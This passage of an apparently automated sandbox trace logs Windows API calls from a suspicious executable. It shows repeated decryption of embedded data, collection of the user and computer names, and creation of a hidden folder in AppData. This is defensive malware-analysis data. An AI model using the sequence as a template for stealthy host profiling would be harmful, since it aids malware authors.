CryptDecrypt (in: hKey=0x4bd59c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26447fc, pdwDataLen=0x18a220 | out: pbData=0x26447fc, pdwDataLen=0x18a220) returned 0 [0122.036] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.036] CryptReleaseContext (hProv=0x768308, dwFlags=0x0) returned 1 [0122.036] CryptReleaseContext (hProv=0x768308, dwFlags=0x0) returned 1 [0122.036] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x768390) returned 1 [0122.037] CryptImportKey (in: hProv=0x768390, pbData=0x2644b50, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.037] CryptContextAddRef (hProv=0x768390, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.037] CryptContextAddRef (hProv=0x768390, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.037] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd5a40) returned 1 [0122.037] CryptContextAddRef (hProv=0x768390, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.037] CryptSetKeyParam (hKey=0x4bd5a40, dwParam=0x4, pbData=0x26452c0*=0x1, dwFlags=0x0) returned 1 [0122.037] CryptSetKeyParam (hKey=0x4bd5a40, dwParam=0x1, pbData=0x264528c, dwFlags=0x0) returned 1 [0122.037] CryptDecrypt (in: hKey=0x4bd5a40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26453a0, pdwDataLen=0x18a220 | out: pbData=0x26453a0, pdwDataLen=0x18a220) returned 1 [0122.037] CryptDecrypt (in: hKey=0x4bd5a40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26453e8, pdwDataLen=0x18a220 | out: pbData=0x26453e8, pdwDataLen=0x18a220) returned 0 [0122.037] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.037] CryptReleaseContext (hProv=0x768390, dwFlags=0x0) returned 1 [0122.037] CryptReleaseContext (hProv=0x768390, dwFlags=0x0) returned 1 [0122.037] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x768418) returned 1 [0122.038] CryptImportKey (in: hProv=0x768418, pbData=0x2645720, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.038] CryptContextAddRef (hProv=0x768418, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.038] CryptContextAddRef (hProv=0x768418, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.038] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd5ac0) returned 1 [0122.038] CryptContextAddRef (hProv=0x768418, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.038] CryptSetKeyParam (hKey=0x4bd5ac0, dwParam=0x4, pbData=0x2645e90*=0x1, dwFlags=0x0) returned 1 [0122.038] CryptSetKeyParam (hKey=0x4bd5ac0, dwParam=0x1, pbData=0x2645e5c, dwFlags=0x0) returned 1 [0122.038] CryptDecrypt (in: hKey=0x4bd5ac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2645f70, pdwDataLen=0x18a220 | out: pbData=0x2645f70, pdwDataLen=0x18a220) returned 1 [0122.038] CryptDecrypt (in: hKey=0x4bd5ac0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2645fb8, pdwDataLen=0x18a220 | out: pbData=0x2645fb8, pdwDataLen=0x18a220) returned 0 [0122.038] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.038] CryptReleaseContext (hProv=0x768418, dwFlags=0x0) returned 1 [0122.038] CryptReleaseContext (hProv=0x768418, dwFlags=0x0) returned 1 [0122.038] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7684a0) returned 1 [0122.039] CryptImportKey (in: hProv=0x7684a0, pbData=0x26462f0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.039] CryptContextAddRef (hProv=0x7684a0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.039] CryptContextAddRef (hProv=0x7684a0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.039] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd5b40) returned 1 [0122.039] CryptContextAddRef (hProv=0x7684a0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.039] CryptSetKeyParam (hKey=0x4bd5b40, dwParam=0x4, pbData=0x2646a60*=0x1, dwFlags=0x0) returned 1 [0122.039] CryptSetKeyParam (hKey=0x4bd5b40, dwParam=0x1, pbData=0x2646a2c, dwFlags=0x0) returned 1 [0122.039] CryptDecrypt (in: hKey=0x4bd5b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2646b40, pdwDataLen=0x18a220 | out: pbData=0x2646b40, pdwDataLen=0x18a220) returned 1 [0122.039] CryptDecrypt (in: hKey=0x4bd5b40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2646b8c, pdwDataLen=0x18a220 | out: pbData=0x2646b8c, pdwDataLen=0x18a220) returned 0 [0122.040] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.040] CryptReleaseContext (hProv=0x7684a0, dwFlags=0x0) returned 1 [0122.040] CryptReleaseContext (hProv=0x7684a0, dwFlags=0x0) returned 1 [0122.040] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x768528) returned 1 [0122.040] CryptImportKey (in: hProv=0x768528, pbData=0x2646ed0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.040] CryptContextAddRef (hProv=0x768528, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.040] CryptContextAddRef (hProv=0x768528, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.041] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd5bc0) returned 1 [0122.041] CryptContextAddRef (hProv=0x768528, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.041] CryptSetKeyParam (hKey=0x4bd5bc0, dwParam=0x4, pbData=0x2647640*=0x1, dwFlags=0x0) returned 1 [0122.041] CryptSetKeyParam (hKey=0x4bd5bc0, dwParam=0x1, pbData=0x264760c, dwFlags=0x0) returned 1 [0122.041] CryptDecrypt (in: hKey=0x4bd5bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2647720, pdwDataLen=0x18a220 | out: pbData=0x2647720, pdwDataLen=0x18a220) returned 1 [0122.041] CryptDecrypt (in: hKey=0x4bd5bc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2647768, pdwDataLen=0x18a220 | out: pbData=0x2647768, pdwDataLen=0x18a220) returned 0 [0122.041] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.041] CryptReleaseContext (hProv=0x768528, dwFlags=0x0) returned 1 [0122.041] CryptReleaseContext (hProv=0x768528, dwFlags=0x0) returned 1 [0122.041] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7685b0) returned 1 [0122.042] CryptImportKey (in: hProv=0x7685b0, pbData=0x2647aa0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.042] CryptContextAddRef (hProv=0x7685b0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.042] CryptContextAddRef (hProv=0x7685b0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.042] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd5c40) returned 1 [0122.042] CryptContextAddRef (hProv=0x7685b0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.042] CryptSetKeyParam (hKey=0x4bd5c40, dwParam=0x4, pbData=0x2648210*=0x1, dwFlags=0x0) returned 1 [0122.042] CryptSetKeyParam (hKey=0x4bd5c40, dwParam=0x1, pbData=0x26481dc, dwFlags=0x0) returned 1 [0122.042] CryptDecrypt (in: hKey=0x4bd5c40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26482f0, pdwDataLen=0x18a220 | out: pbData=0x26482f0, pdwDataLen=0x18a220) returned 1 [0122.042] CryptDecrypt (in: hKey=0x4bd5c40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2648338, pdwDataLen=0x18a220 | out: pbData=0x2648338, pdwDataLen=0x18a220) returned 0 [0122.042] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.042] CryptReleaseContext (hProv=0x7685b0, dwFlags=0x0) returned 1 [0122.042] CryptReleaseContext (hProv=0x7685b0, dwFlags=0x0) returned 1 [0122.042] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x768638) returned 1 [0122.043] CryptImportKey (in: hProv=0x768638, pbData=0x2648674, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.043] CryptContextAddRef (hProv=0x768638, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.043] CryptContextAddRef (hProv=0x768638, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.043] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd5cc0) returned 1 [0122.043] CryptContextAddRef (hProv=0x768638, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.043] CryptSetKeyParam (hKey=0x4bd5cc0, dwParam=0x4, pbData=0x2648de4*=0x1, dwFlags=0x0) returned 1 [0122.043] CryptSetKeyParam (hKey=0x4bd5cc0, dwParam=0x1, pbData=0x2648db0, dwFlags=0x0) returned 1 [0122.043] CryptDecrypt (in: hKey=0x4bd5cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2648ec4, pdwDataLen=0x18a220 | out: pbData=0x2648ec4, pdwDataLen=0x18a220) returned 1 [0122.043] CryptDecrypt (in: hKey=0x4bd5cc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2648f0c, pdwDataLen=0x18a220 | out: pbData=0x2648f0c, pdwDataLen=0x18a220) returned 0 [0122.043] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.043] CryptReleaseContext (hProv=0x768638, dwFlags=0x0) returned 1 [0122.043] CryptReleaseContext (hProv=0x768638, dwFlags=0x0) returned 1 [0122.044] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7686c0) returned 1 [0122.044] CryptImportKey (in: hProv=0x7686c0, pbData=0x2649254, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.044] CryptContextAddRef (hProv=0x7686c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.044] CryptContextAddRef (hProv=0x7686c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.044] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd5d40) returned 1 [0122.044] CryptContextAddRef (hProv=0x7686c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.044] CryptSetKeyParam (hKey=0x4bd5d40, dwParam=0x4, pbData=0x26499d4*=0x1, dwFlags=0x0) returned 1 [0122.045] CryptSetKeyParam (hKey=0x4bd5d40, dwParam=0x1, pbData=0x26499a0, dwFlags=0x0) returned 1 [0122.045] CryptDecrypt (in: hKey=0x4bd5d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2649ab8, pdwDataLen=0x18a1f0 | out: pbData=0x2649ab8, pdwDataLen=0x18a1f0) returned 1 [0122.045] CryptDecrypt (in: hKey=0x4bd5d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2649b18, pdwDataLen=0x18a220 | out: pbData=0x2649b18, pdwDataLen=0x18a220) returned 1 [0122.045] CryptDecrypt (in: hKey=0x4bd5d40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2649b64, pdwDataLen=0x18a220 | out: pbData=0x2649b64, pdwDataLen=0x18a220) returned 0 [0122.045] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.045] CryptReleaseContext (hProv=0x7686c0, dwFlags=0x0) returned 1 [0122.045] CryptReleaseContext (hProv=0x7686c0, dwFlags=0x0) returned 1 [0122.045] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x768748) returned 1 [0122.046] CryptImportKey (in: hProv=0x768748, pbData=0x2649ed8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.046] CryptContextAddRef (hProv=0x768748, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.046] CryptContextAddRef (hProv=0x768748, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.046] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd5dc0) returned 1 [0122.046] CryptContextAddRef (hProv=0x768748, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.046] CryptSetKeyParam (hKey=0x4bd5dc0, dwParam=0x4, pbData=0x264a648*=0x1, dwFlags=0x0) returned 1 [0122.046] CryptSetKeyParam (hKey=0x4bd5dc0, dwParam=0x1, pbData=0x264a614, dwFlags=0x0) returned 1 [0122.046] CryptDecrypt (in: hKey=0x4bd5dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x264a728, pdwDataLen=0x18a220 | out: pbData=0x264a728, pdwDataLen=0x18a220) returned 1 [0122.046] CryptDecrypt (in: hKey=0x4bd5dc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x264a770, pdwDataLen=0x18a220 | out: pbData=0x264a770, pdwDataLen=0x18a220) returned 0 [0122.046] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.046] CryptReleaseContext (hProv=0x768748, dwFlags=0x0) returned 1 [0122.046] CryptReleaseContext (hProv=0x768748, dwFlags=0x0) returned 1 [0122.046] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7687d0) returned 1 [0122.047] CryptImportKey (in: hProv=0x7687d0, pbData=0x264aaac, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.047] CryptContextAddRef (hProv=0x7687d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.047] CryptContextAddRef (hProv=0x7687d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.047] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd5e40) returned 1 [0122.047] CryptContextAddRef (hProv=0x7687d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.047] CryptSetKeyParam (hKey=0x4bd5e40, dwParam=0x4, pbData=0x264b21c*=0x1, dwFlags=0x0) returned 1 [0122.047] CryptSetKeyParam (hKey=0x4bd5e40, dwParam=0x1, pbData=0x264b1e8, dwFlags=0x0) returned 1 [0122.047] CryptDecrypt (in: hKey=0x4bd5e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x264b2fc, pdwDataLen=0x18a220 | out: pbData=0x264b2fc, pdwDataLen=0x18a220) returned 1 [0122.047] CryptDecrypt (in: hKey=0x4bd5e40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x264b344, pdwDataLen=0x18a220 | out: pbData=0x264b344, pdwDataLen=0x18a220) returned 0 [0122.047] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.047] CryptReleaseContext (hProv=0x7687d0, dwFlags=0x0) returned 1 [0122.047] CryptReleaseContext (hProv=0x7687d0, dwFlags=0x0) returned 1 [0122.048] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x4bdd5c0) returned 1 [0122.048] CryptImportKey (in: hProv=0x4bdd5c0, pbData=0x264b690, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.048] CryptContextAddRef (hProv=0x4bdd5c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.048] CryptContextAddRef (hProv=0x4bdd5c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.048] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd5ec0) returned 1 [0122.049] CryptContextAddRef (hProv=0x4bdd5c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.049] CryptSetKeyParam (hKey=0x4bd5ec0, dwParam=0x4, pbData=0x264be10*=0x1, dwFlags=0x0) returned 1 [0122.049] CryptSetKeyParam (hKey=0x4bd5ec0, dwParam=0x1, pbData=0x264bddc, dwFlags=0x0) returned 1 [0122.049] CryptDecrypt (in: hKey=0x4bd5ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x264bef4, pdwDataLen=0x18a1f0 | out: pbData=0x264bef4, pdwDataLen=0x18a1f0) returned 1 [0122.049] CryptDecrypt (in: hKey=0x4bd5ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x264bf54, pdwDataLen=0x18a220 | out: pbData=0x264bf54, pdwDataLen=0x18a220) returned 1 [0122.049] CryptDecrypt (in: hKey=0x4bd5ec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x264bfa0, pdwDataLen=0x18a220 | out: pbData=0x264bfa0, pdwDataLen=0x18a220) returned 0 [0122.049] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.049] CryptReleaseContext (hProv=0x4bdd5c0, dwFlags=0x0) returned 1 [0122.049] CryptReleaseContext (hProv=0x4bdd5c0, dwFlags=0x0) returned 1 [0122.049] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x4bdd648) returned 1 [0122.050] CryptImportKey (in: hProv=0x4bdd648, pbData=0x264c318, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x74f850) returned 1 [0122.050] CryptContextAddRef (hProv=0x4bdd648, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.050] CryptContextAddRef (hProv=0x4bdd648, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.050] CryptDuplicateKey (in: hKey=0x74f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4bd5f40) returned 1 [0122.050] CryptContextAddRef (hProv=0x4bdd648, pdwReserved=0x0, dwFlags=0x0) returned 1 [0122.050] CryptSetKeyParam (hKey=0x4bd5f40, dwParam=0x4, pbData=0x264ca88*=0x1, dwFlags=0x0) returned 1 [0122.050] CryptSetKeyParam (hKey=0x4bd5f40, dwParam=0x1, pbData=0x264ca54, dwFlags=0x0) returned 1 [0122.050] CryptDecrypt (in: hKey=0x4bd5f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x264cb68, pdwDataLen=0x18a220 | out: pbData=0x264cb68, pdwDataLen=0x18a220) returned 1 [0122.050] CryptDecrypt (in: hKey=0x4bd5f40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x264cbb0, pdwDataLen=0x18a220 | out: pbData=0x264cbb0, pdwDataLen=0x18a220) returned 0 [0122.050] CryptDestroyKey (hKey=0x74f850) returned 1 [0122.050] CryptReleaseContext (hProv=0x4bdd648, dwFlags=0x0) returned 1 [0122.050] CryptReleaseContext (hProv=0x4bdd648, dwFlags=0x0) returned 1 [0122.129] CoTaskMemAlloc (cb=0x20c) returned 0x4bcbca8 [0122.129] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x4bcbca8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0122.132] CoTaskMemFree (pv=0x4bcbca8) [0122.134] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x189d58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local", lpFilePart=0x0) returned 0x1f [0122.181] GetUserNameW (in: lpBuffer=0x18a060, pcbBuffer=0x18a2d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x18a2d8) returned 1 [0122.183] GetComputerNameW (in: lpBuffer=0x18a060, nSize=0x18a2d8 | out: lpBuffer="YKYD69Q", nSize=0x18a2d8) returned 1 [0122.185] CoTaskMemAlloc (cb=0x20c) returned 0x4be0730 [0122.185] GetSystemDirectoryW (in: lpBuffer=0x4be0730, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0122.185] CoTaskMemFree (pv=0x4be0730) [0122.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x189d40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0122.194] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x189d44, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0122.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18a294) returned 1 [0122.196] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x18a2c0, lpTotalNumberOfBytes=0x18a2b8, lpTotalNumberOfFreeBytes=0x18a2b0 | out: lpFreeBytesAvailableToCaller=0x18a2c0, lpTotalNumberOfBytes=0x18a2b8, lpTotalNumberOfFreeBytes=0x18a2b0) returned 1 [0122.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18a290) returned 1 [0122.963] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", nBufferLength=0x105, lpBuffer=0x189ea8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", lpFilePart=0x0) returned 0x2a [0122.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18a284) returned 1 [0122.964] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933"), fInfoLevelId=0x0, lpFileInformation=0x265dcb0 | out: lpFileInformation=0x265dcb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0122.964] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18a280) returned 1 [0122.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18a1f0) returned 1 [0122.971] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933"), fInfoLevelId=0x0, lpFileInformation=0x18a26c | out: lpFileInformation=0x18a26c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0122.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18a1ec) returned 1 [0122.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18a1f0) returned 1 [0122.972] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933"), fInfoLevelId=0x0, lpFileInformation=0x18a26c | out: lpFileInformation=0x18a26c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0122.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18a1ec) returned 1 [0122.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18a1f0) returned 1 [0122.972] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local" (normalized: "c:\\users\\aetadzjz\\appdata\\local"), fInfoLevelId=0x0, lpFileInformation=0x18a26c | out: lpFileInformation=0x18a26c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x23383600, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7b7c3bb0, ftLastAccessTime.dwHighDateTime=0x1d2fb15, ftLastWriteTime.dwLowDateTime=0x7b7c3bb0, ftLastWriteTime.dwHighDateTime=0x1d2fb15, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0122.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18a1ec) returned 1 [0122.974] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933"), lpSecurityAttributes=0x0) returned 1 [0122.977] SleepEx (dwMilliseconds=0x7d0, bAlertable=1) returned 0x0 [0125.018] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0126.064] GetTimeZoneInformation (in: lpTimeZoneInformation=0x1889a4 | out: lpTimeZoneInformation=0x1889a4) returned 0x0 [0126.188] GetUserNameW (in: lpBuffer=0x189f88, pcbBuffer=0x18a200 | out: lpBuffer="aETAdzjz", pcbBuffer=0x18a200) returned 1 [0126.777] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe.config", nBufferLength=0x105, lpBuffer=0x189b24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe.config", lpFilePart=0x0) returned 0x40 [0126.792] GetCurrentProcess () returned 0xffffffff [0126.792] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189ecc | out: TokenHandle=0x189ecc*=0x224) returned 1 [0126.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x1899ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0126.796] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x189ecc | out: lpFileInformation=0x189ecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92785300, ftCreationTime.dwHighDateTime=0x1cd5d48, ftLastAccessTime.dwLowDateTime=0x346650f0, ftLastAccessTime.dwHighDateTime=0x1d2f186, ftLastWriteTime.dwLowDateTime=0x92785300, ftLastWriteTime.dwHighDateTime=0x1cd5d48, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0126.798] GetFullPathNameW (in: 